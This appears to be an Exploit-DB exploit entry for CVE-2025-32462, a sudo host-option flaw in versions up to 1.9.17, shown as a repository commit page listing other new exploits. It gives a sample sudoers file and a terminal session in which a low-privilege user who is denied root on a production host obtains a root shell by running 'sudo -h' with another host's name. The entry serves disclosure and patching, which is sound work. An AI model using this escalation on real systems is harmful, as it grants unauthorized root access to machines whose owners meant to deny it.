1c08d6e575
9 changes to exploits/shellcodes/ghdb Sudo 1.9.17 Host Option - Elevation of Privilege Sudo chroot 1.9.17 - Local Privilege Escalation Microsoft Defender for Endpoint (MDE) - Elevation of Privilege ScriptCase 9.12.006 (23) - Remote Command Execution (RCE) Discourse 3.2.x - Anonymous Cache Poisoning Stacks Mobile App Builder 5.2.3 - Authentication Bypass via Account Takeover Microsoft Outlook - Remote Code Execution (RCE) Microsoft PowerPoint 2019 - Remote Code Execution (RCE)
60 lines
No EOL
2.2 KiB
Text
60 lines
No EOL
2.2 KiB
Text
# Exploit Title: Sudo 1.9.17 Host Option - Elevation of Privilege
|
|
# Date: 2025-06-30
|
|
# Exploit Author: Rich Mirch
|
|
# Vendor Homepage: https://www.sudo.ws
|
|
# Software Link: https://www.sudo.ws/dist/sudo-1.9.17.tar.gz
|
|
# Version: Stable 1.9.0 - 1.9.17, Legacy 1.8.8 - 1.8.32
|
|
# Fixed in: 1.9.17p1
|
|
# Vendor Advisory: https://www.sudo.ws/security/advisories/host_any
|
|
# Blog:
|
|
https://www.stratascale.com/vulnerability-alert-CVE-2025-32462-sudo-host
|
|
# Tested on: Ubuntu 24.04.1; Sudo 1.9.15p5, macOS Sequoia 15.3.2; Sudo
|
|
1.9.13p2
|
|
# CVE : CVE-2025-32462
|
|
#
|
|
No exploit is required. Executing a sudo or sudoedit command with the host
|
|
option referencing an unrelated remote host rule causes Sudo to treat the
|
|
rule as valid for the local system. As a result, any command allowed by the
|
|
remote host rule can be executed on the local machine.
|
|
|
|
Example /etc/sudoers file using the Host_Alias directive. The lowpriv user
|
|
is allowed to execute all commands (full root) on dev.test.local,
|
|
ci.test.local, but not prod.test.local.
|
|
|
|
Host_Alias SERVERS = prod.test.local, dev.test.local
|
|
Host_Alias PROD = prod.test.local
|
|
lowpriv SERVERS, !PROD = NOPASSWD:ALL
|
|
lowpriv ci.test.local = NOPASSWD:ALL
|
|
|
|
Even though the prod.test.local server is explicitly denied for the lowpriv
|
|
user, root access is achieved by specifying the host option for the
|
|
dev.test.local or ci.test.local servers.
|
|
|
|
Example
|
|
|
|
Show that lowpriv is not allowed to execute sudo on the prod server.
|
|
|
|
lowpriv@prod:~$ id
|
|
uid=1001(lowpriv) gid=1001(lowpriv) groups=1001(lowpriv)
|
|
lowpriv@prod:~$ sudo -l
|
|
[sudo] password for lowpriv:
|
|
Sorry, user lowpriv may not run sudo on prod.
|
|
|
|
List the host rules for the dev.test.local server.
|
|
|
|
lowpriv@prod:~$ sudo -l -h dev.test.local
|
|
Matching Defaults entries for lowpriv on dev:
|
|
env_reset, mail_badpass,
|
|
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
|
|
use_pty
|
|
|
|
User lowpriv may run the following commands on dev:
|
|
(root) NOPASSWD: ALL
|
|
|
|
Execute a root shell on prod.test.local by specifying the -h dev.test.local
|
|
option.
|
|
|
|
lowpriv@prod:~$ sudo -h dev.test.local -i
|
|
sudo: a remote host may only be specified when listing privileges.
|
|
root@prod:~# id
|
|
uid=0(root) gid=0(root) groups=0(root) |